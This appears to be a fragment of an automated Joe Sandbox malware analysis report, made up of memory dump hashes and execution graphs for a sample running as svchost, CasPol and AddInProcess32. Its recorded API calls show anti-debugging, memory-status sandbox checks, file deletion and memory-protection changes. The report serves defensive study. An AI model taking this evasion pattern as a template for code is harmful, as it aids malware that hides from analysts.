                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: effa71d2881189cda721adfc2c74af8344609aaa4a3757c7e556f4e8865daba8
                                                                                                                                                                                                                                                    • Instruction ID: 8258b03980ece7e47eff9edf23f25dc2e01872e801628cd9cc7a6404aab2c9c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: effa71d2881189cda721adfc2c74af8344609aaa4a3757c7e556f4e8865daba8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B121C0B5D01219AFCB10DF9AD985BDEFBB8FB48310F10812AE918A7340D374A544CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c89bcab36d95faa468cfd2cc711b6d7d6972666b6539e1d817b36b467dcf3244
                                                                                                                                                                                                                                                    • Instruction ID: 9e55e95318946991ae0fd2b5e2f9ea10c1c7beb00c6f03d0f85e9e8eb60ac3c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c89bcab36d95faa468cfd2cc711b6d7d6972666b6539e1d817b36b467dcf3244
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5601DF31F441001BDF61962CD8A5B2F77DADBCA711F50882AE90ACB381DE12DC8643A2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3fd08306071be5d640e747f83c4b1588c3d917ccd2498bb7b94efa87dda7c6ca
                                                                                                                                                                                                                                                    • Instruction ID: 99e962fb813516b032809f3d8976f290b9334fc9f346beebd4bcae50c9171561
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd08306071be5d640e747f83c4b1588c3d917ccd2498bb7b94efa87dda7c6ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F001B936B101285FDF64A67DC8246BF77AAABC4300F040136D909E7348EE659C1243E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ba0f6d05b3775297881aded744d8f1434250846e3d44517f40a2d081767991eb
                                                                                                                                                                                                                                                    • Instruction ID: 58d28c01e4866a6e0ba4902eb3f512734de6a0002f409655ae5793811dd6c6d4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba0f6d05b3775297881aded744d8f1434250846e3d44517f40a2d081767991eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6411CFB5D01219AFCB10DF9AD984BDEFBB8FB48310F10812AE918A7300D374A944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b95e5c8fb3d9d41acea97676f0905d24b3c4806521b678e12513bc2add00bb69
                                                                                                                                                                                                                                                    • Instruction ID: 8cfcf451f2fa433c43113f761f1ec1f38cac3ce9ccf6aeece449fae3f64d6fde
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b95e5c8fb3d9d41acea97676f0905d24b3c4806521b678e12513bc2add00bb69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4018131B101100BDF64966ED454B2FB3DEDBC9720F20883AE50EDB384DE65DC8243A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4f7a65f1f0afe73914885e01808770ab1438aa6235f3161a28b35254c7c4de43
                                                                                                                                                                                                                                                    • Instruction ID: fd33f77be5cb9d945da4ef1f94efad2bbbe14e80dc2b1b8f0cc677cc25c5a366
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f7a65f1f0afe73914885e01808770ab1438aa6235f3161a28b35254c7c4de43
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE018131F001144BDF65D62DD4A4B2F77DAEBC9710F508839E50ACB384DE16DC8247A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e4eb7bc5938a01a2bcb12cea343409dc67896f47a75d2fc9c6c9e580af3471ad
                                                                                                                                                                                                                                                    • Instruction ID: ee69d044ee8e3306e82d4b6779424eeb6a38e5b311de441a84380082a00dde87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4eb7bc5938a01a2bcb12cea343409dc67896f47a75d2fc9c6c9e580af3471ad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD014430B501144FDB64EA7DD4A0B2F73DAEB89750F508928E90ECB354EE61DC828791
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 14.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 41
Total number of Limit Nodes: 3

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID: $
• API String ID: 1029625771-3993045852
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
Similarity
• API ID:
• String ID: 86yn
• API String ID: 0-1623857296
                                                                                                                                                                                                                                                    • Opcode ID: 914c2b09898f6af413eaf1ab696c9a9b88c6a7b654ad918a64baf538d3b9772b
                                                                                                                                                                                                                                                    • Instruction ID: e58ad9bcd6d7012be99df9f41969266004ecc996c6bc2ad7861378b967d9c6cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c2b09898f6af413eaf1ab696c9a9b88c6a7b654ad918a64baf538d3b9772b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD52493190DAC95FD756EF2888655A4BFF0FF67314B4902FEC489CB1A3D968A806C391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1422 7ff7c1912d84-7ff7c1912d8b 1423 7ff7c1912d8d-7ff7c1912d95 1422->1423 1424 7ff7c1912d96-7ff7c1912e4f VirtualProtect 1422->1424 1423->1424 1427 7ff7c1912e57-7ff7c1912e7f 1424->1427 1428 7ff7c1912e51 1424->1428 1428->1427
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: cee19c878404196fa64880105d5253f738cd799055b153ad957e8ba290fc64db
                                                                                                                                                                                                                                                    • Instruction ID: 864dee4169b962584deec46448f0fe4fee9af4ace1daf3276ba3dce1e2d69e41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee19c878404196fa64880105d5253f738cd799055b153ad957e8ba290fc64db
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F931C93190CA4C5FDB08EF9898466F9BBF1EB56321F14426FD049C3292DB746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1429 7ff7c1910a58-7ff7c1910a5f 1430 7ff7c1910a6a-7ff7c1910afc FreeConsole 1429->1430 1431 7ff7c1910a61-7ff7c1910a69 1429->1431 1434 7ff7c1910afe 1430->1434 1435 7ff7c1910b04-7ff7c1910b2b 1430->1435 1431->1430 1434->1435
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1668503482.00007FF7C1910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1910000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c1910000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: dc33f3eaadc61e83dd2757b5b551f702aa70f48fb5430bf048a4c7ed8fa5eaf6
                                                                                                                                                                                                                                                    • Instruction ID: 83c077a2e934a72b8a345584a9d92e9a7799d52a35314723ce5b3cbf9aa7ba86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc33f3eaadc61e83dd2757b5b551f702aa70f48fb5430bf048a4c7ed8fa5eaf6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B31C57190CB4C8FDB19DFA9D8497EABBF0EB56321F00426ED089C3192DA74B455CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f92906b42af21187cde5b458eb0c38f25945fde8133ca87eb98c81980ace2c27
                                                                                                                                                                                                                                                    • Instruction ID: 89cab3e543c3da3aca74afb5c267c927f8e8ab86a4bb3db09161397d8eacd04d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f92906b42af21187cde5b458eb0c38f25945fde8133ca87eb98c81980ace2c27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361163150DAC94FDB56EF2888645A5BBF1EF5B31470901FBC44ACB193CA28A805C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 36f905440a0209af5a14169cc126b6152331871d1a64dd4ffbb6942882bd1bc6
                                                                                                                                                                                                                                                    • Instruction ID: 53294f4cec177ae39caa22d9dd7d27da0a1478b49e07ea563c52af659408362c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36f905440a0209af5a14169cc126b6152331871d1a64dd4ffbb6942882bd1bc6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E01230A14A298EDF60EB58CC81BEAB3B1FB88310F1041E6D44DE3251CB306A84CF82
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:11.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:141
                                                                                                                                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                                                                                                                                    execution_graph 40382 6223ae0 DuplicateHandle 40383 6223b76 40382->40383 40546 6223898 40547 62238de GetCurrentProcess 40546->40547 40549 6223930 GetCurrentThread 40547->40549 40550 6223929 40547->40550 40551 6223966 40549->40551 40552 622396d GetCurrentProcess 40549->40552 40550->40549 40551->40552 40555 62239a3 40552->40555 40553 62239cb GetCurrentThreadId 40554 62239fc 40553->40554 40555->40553 40384 1440848 40386 144084e 40384->40386 40385 144091b 40386->40385 40390 144137f 40386->40390 40399 6222790 40386->40399 40403 6222780 40386->40403 40392 144138b 40390->40392 40391 14414be 40391->40386 40392->40391 40407 1448a20 40392->40407 40412 144829c 40392->40412 40417 14482da 40392->40417 40422 1448339 40392->40422 40427 1448170 40392->40427 40432 1448161 40392->40432 40400 622279f 40399->40400 40459 6221f24 40400->40459 40404 622279f 40403->40404 40405 6221f24 4 API calls 40404->40405 40406 62227c0 40405->40406 40406->40386 40408 1448a2a 40407->40408 40409 1448a44 40408->40409 40437 624fa28 40408->40437 40442 624fa18 40408->40442 40409->40392 40413 14482a1 40412->40413 40447 14487e8 40413->40447 40451 14487d8 40413->40451 40414 14483cb 40414->40392 40419 14482df 40417->40419 40418 14483cb 40418->40392 40420 14487d8 DeleteFileW 40419->40420 40421 14487e8 DeleteFileW 40419->40421 40420->40418 40421->40418 40424 144833e 40422->40424 40423 14483cb 40423->40392 40425 14487d8 DeleteFileW 40424->40425 40426 14487e8 DeleteFileW 40424->40426 40425->40423 40426->40423 40429 1448189 40427->40429 40428 14483cb 40428->40392 40429->40428 40430 14487d8 DeleteFileW 40429->40430 40431 14487e8 DeleteFileW 40429->40431 40430->40428 40431->40428 40434 1448189 40432->40434 40433 14483cb 40433->40392 40434->40433 40435 14487d8 DeleteFileW 
40434->40435 40436 14487e8 DeleteFileW 40434->40436 40435->40433 40436->40433 40439 624fa3d 40437->40439 40438 624fc52 40438->40409 40439->40438 40440 624fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 40439->40440 40441 624fc78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40439->40441 40440->40439 40441->40439 40444 624fa3d 40442->40444 40443 624fc52 40443->40409 40444->40443 40445 624fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 40444->40445 40446 624fc78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40444->40446 40445->40444 40446->40444 40448 14487f8 40447->40448 40449 144882a 40448->40449 40455 1447790 40448->40455 40449->40414 40452 14487f8 40451->40452 40453 1447790 DeleteFileW 40452->40453 40454 144882a 40452->40454 40453->40454 40454->40414 40456 1448848 DeleteFileW 40455->40456 40458 14488c7 40456->40458 40458->40449 40460 6221f2f 40459->40460 40463 6223694 40460->40463 40462 6224146 40462->40462 40464 622369f 40463->40464 40465 622486c 40464->40465 40467 62264e8 40464->40467 40465->40462 40468 6226509 40467->40468 40469 622652d 40468->40469 40471 6226698 40468->40471 40469->40465 40473 62266a5 40471->40473 40472 62266de 40472->40469 40473->40472 40475 62253bc 40473->40475 40476 62253c7 40475->40476 40478 6226750 40476->40478 40479 62253f0 40476->40479 40478->40478 40480 62253fb 40479->40480 40486 6225400 40480->40486 40482 62267bf 40490 622bac8 40482->40490 40498 622bae0 40482->40498 40483 62267f9 40483->40478 40489 622540b 40486->40489 40487 6227960 40487->40482 40488 62264e8 4 API calls 40488->40487 40489->40487 40489->40488 40491 622bad8 40490->40491 40492 622bb1d 40491->40492 40507 622bd48 40491->40507 40511 622bd58 40491->40511 40492->40483 40493 622bb5d 40515 622d058 40493->40515 40520 622d049 40493->40520 40500 622bb11 40498->40500 40501 622bc11 40498->40501 40499 622bb1d 40499->40483 40500->40499 40503 622bd48 2 API calls 40500->40503 40504 622bd58 2 API calls 40500->40504 40501->40483 40502 622bb5d 40505 622d058 2 API calls 40502->40505 40506 622d049 2 
API calls 40502->40506 40503->40502 40504->40502 40505->40501 40506->40501 40508 622bd54 40507->40508 40525 622bd98 40508->40525 40509 622bd62 40509->40493 40512 622bd5a 40511->40512 40514 622bd98 2 API calls 40512->40514 40513 622bd62 40513->40493 40514->40513 40516 622d083 40515->40516 40517 622d132 40516->40517 40533 622de30 40516->40533 40538 622deb1 40516->40538 40521 622d054 40520->40521 40522 622d132 40521->40522 40523 622de30 CreateWindowExW 40521->40523 40524 622deb1 CreateWindowExW 40521->40524 40522->40522 40523->40522 40524->40522 40526 622bd9d 40525->40526 40527 622bddc 40526->40527 40531 622c033 LoadLibraryExW 40526->40531 40532 622c040 LoadLibraryExW 40526->40532 40527->40509 40528 622bfe0 GetModuleHandleW 40530 622c00d 40528->40530 40529 622bdd4 40529->40527 40529->40528 40530->40509 40531->40529 40532->40529 40535 622de34 40533->40535 40534 622de80 40534->40517 40535->40517 40535->40534 40536 622e053 CreateWindowExW 40535->40536 40537 622e0b4 40536->40537 40537->40537 40540 622deb4 40538->40540 40539 622df00 40539->40517 40540->40517 40540->40539 40541 622e053 CreateWindowExW 40540->40541 40542 622e0b4 40541->40542 40542->40542 40543 14470c8 40544 144710c CheckRemoteDebuggerPresent 40543->40544 40545 144714e 40544->40545
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7218cc007962fe99cee8b56f46c9637fd49e4c64565a80fc90e9eb35602425f1
                                                                                                                                                                                                                                                    • Instruction ID: 4f33bd84207c47bb5ca763ad949b6b4e53fc7528ea1af327c05a77465d0b0eda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7218cc007962fe99cee8b56f46c9637fd49e4c64565a80fc90e9eb35602425f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D23B30E10215CFDB68EB69C484A9DB7B2FF89310F54C5A9E809AB251DB35ED85CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7b739ad53dcd82fdf53697e372266e97eea191053ae382613dc8a0eec4fa95f8
                                                                                                                                                                                                                                                    • Instruction ID: 909f64d3acadf132aab61a1a4df4f53c1b7d12770bcb12a9bc731934472180ac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b739ad53dcd82fdf53697e372266e97eea191053ae382613dc8a0eec4fa95f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79528270E2020A8FEF68EB69D4947ADB7B6FB45311F608429D806EB351DB34DC81CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5d34944327643f26ec9a91e223ae389a8d6bbeb8f8e77df87e5f8e59bd20a1da
                                                                                                                                                                                                                                                    • Instruction ID: 43a28802a7ba5e89c1e0ade74dfcf414799b27db07db6943f8038fa7fef80350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d34944327643f26ec9a91e223ae389a8d6bbeb8f8e77df87e5f8e59bd20a1da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3332B574B112099FDB58EB6CE484BADBBB6FB88350F108525D805EB351DB35EC81CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: def64406fd57d5f379f1398c26649b0cf241710da2164916f441c1840debd580
                                                                                                                                                                                                                                                    • Instruction ID: 5234c8908ca9b1bda51d60220721704c90e7db3147affdcf8db5fa974e7721c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: def64406fd57d5f379f1398c26649b0cf241710da2164916f441c1840debd580
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C402A430B202158FDB58EB69D494BAEBBE2FF84300F148569D815DB391DB75EC82CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06223953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 062239E9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: aad72ac47d68a4ba26fb583968b47ce3761da8f676e2d65baa2fbf7a6ed19746
                                                                                                                                                                                                                                                    • Instruction ID: 9192d328412eded830974ba333ffbc101d9a07dd695078c45b87dccaa282395d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aad72ac47d68a4ba26fb583968b47ce3761da8f676e2d65baa2fbf7a6ed19746
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C5187B1D1030A8FDB54CFA9D948BAEBBF1EF48300F248419D459A7350DB385944CF65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06223953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 062239E9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
